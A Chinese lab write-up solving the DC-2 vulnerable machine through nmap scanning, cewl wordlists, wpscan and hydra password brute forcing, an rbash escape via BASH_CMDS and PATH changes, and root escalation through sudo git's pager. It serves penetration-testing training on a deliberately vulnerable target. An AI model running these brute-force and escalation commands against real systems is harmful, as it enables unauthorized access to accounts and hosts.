064 渗透测试实战,靶机 DC-2

一:环境准备

下载:点我

下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1

打开DC-2
在这里插入图片描述
打开Kali
nmap 扫描局域网主机
nmap -sP 192.168.100.0/24 -oN nmap.sP
在这里插入图片描述
确定主机之后,对主机进行端口扫描:
nmap -A 192.168.100.8 -p 1-65535 -oN nmap.A
在这里插入图片描述
发现开放了80和7744端口号。

开放了80端口号,所以这时候我们尝试浏览器访问网站。
当你浏览器输入:192.168.100.8 这个地址的时候,会重定向到dc-2
在这里插入图片描述
我们在返回去看,80端口的具体说明:发现:
在这里插入图片描述
已经告诉你了,会重定向到dc-2,那怎么办?

修改本地DNS域名解析
vim /etc/hosts
加入地址解析。如下图,
在这里插入图片描述
然后刷新浏览器,
在这里插入图片描述

 

二:flag1

点击flag进入。
在这里插入图片描述

 

三:flag2

从上述提示,我们需要用到cewl。

那么这个cewl是什么呢?
这是网上的大佬文章,详细说了cewl:点我

简单的说:
该工具最大的功能就是能够爬取网站上的信息并自动生成字典,然后就可以使用该字典配合hydra去进行暴力破解,该工具常用于CTF中攻靶拿Flag使用。

参数说明:

-h,  –help:						显示帮助。
-k,  –keep:						保存下载文件。
-d <x>,  –depth <x>:				爬行深度,默认2。
-m,  –min_world_length:			最小长度,默认最小长度为3。
-o,  –offsite:						允许爬虫访问其他站点。
-w, –write:						将输出结果写入到文件。
-u,  –ua <agent>:					设置user agent。
-n,  –no-words:					不输出字典。
–with-numbers:						允许单词中存在数字,跟字母一样。
-a,  –meta:						包括元数据。
–meta_file file:					输出元数据文件。
-e,  –email:						包括email地址。
–email_file <file>:				输入邮件地址文件。
–meta-temp-dir <dir>:				exiftool解析文件时使用的临时目录,默认是/temp。
-c,  –count:						显示发现的每个单词的数量。
-v,  –verbose:						verbose。
–debug:								提取调试信息。

既然刚才提示我们用cewl,那我们就使用命令cewl dc-2 > pwd.dic
在这里插入图片描述
在这里插入图片描述

 

用msfconsole网站目录扫描演示:

对网站目录进行扫描,上一章节内容说到用dirb,dirbuster工具,这一节内容,我们可以用msfconsole工具。

开启msfconsole
msfconsole
use auxiliary/scanner/http/dir_scanner
show options
set rhosts 192.168.100.8
set threads 50
exploit
扫描之后发现两个目录,如下图
在这里插入图片描述
扫描成功,浏览器访问wp-includes,http://192.168.100.8/wp-includes/
在这里插入图片描述

接下来继续

wpscan工具
先更新:
wpscan --update
在这里插入图片描述
扫描这个网站的用户:wpscan --url dc-2 -e u
得到三个用户信息,如下图:
在这里插入图片描述
创建一个用户字典,vim user.dic 把三个用户填写进去。
在这里插入图片描述
然后wpscan爆破用户,wpscan --url dc-2 -U user.dic -P pwd.dic

获得jerry和tom的账号密码
在这里插入图片描述
进入网站后台登录界面,dc-2/wp-login.php
在这里插入图片描述
登录成功,东点点西看看,发现flag2
在这里插入图片描述
点进去,
在这里插入图片描述

他告诉我们需要用其他方法,谷歌翻译诚不骗我,,哈哈哈
在这里插入图片描述
我们想到了刚开始使用nmap 扫描时,还扫出了ssh 端口7744

 

四:flag3

hydra 爆破ssh
hydra -L user.dic -P pwd.dic ssh://192.168.100.8 -s 7744 -o hydra.ssh -vV

-vV 在页面显示详细信息。

等待几分钟。。。

发现tom用户可以连接
在这里插入图片描述

用ssh进行连接 ssh tom@192.168.100.8 -p 7744 登录成功。
在这里插入图片描述
cat flag3.txt 发现报错-rbash: cat: command not found
在这里插入图片描述

现在我们就需要绕过指令限制

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
在这里插入图片描述

 

五:flag4

flag3线索:引向jerry账户。
那么我们就查看用户:cat etc/passwd
在这里插入图片描述
切换jerry用户
su jerry
输入jerry密码:adipiscing
登录成功
在这里插入图片描述
通过cd命令进入jerry家目录,看到flag4.txt
在这里插入图片描述

 

六:flag5

接下来cd /root,发现没有权限。
由flag4的内容Go on - git outta here!!!!提示,猜测是否可以通过git进行提权。

通过执行命令sudo -l 发现git命令在执行过程中不需要root的密码。
在这里插入图片描述
所以通过git进行提权。

这个地方有个坑点
一开始,我是全屏窗口的。如下图:
输入sudo git -p --help 进入交互式状态
在这里插入图片描述
全屏显示下,依然不会有交互式状态出现。

需要把窗口变小,让页面缓冲区无法显示全部信息,强行进入交互状态。

类似下图:
在这里插入图片描述

输入sudo git -p --help 进入交互式状态
在这里插入图片描述

然后输入!/bin/bash调用bash,成功获取管理员权限。
在这里插入图片描述
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值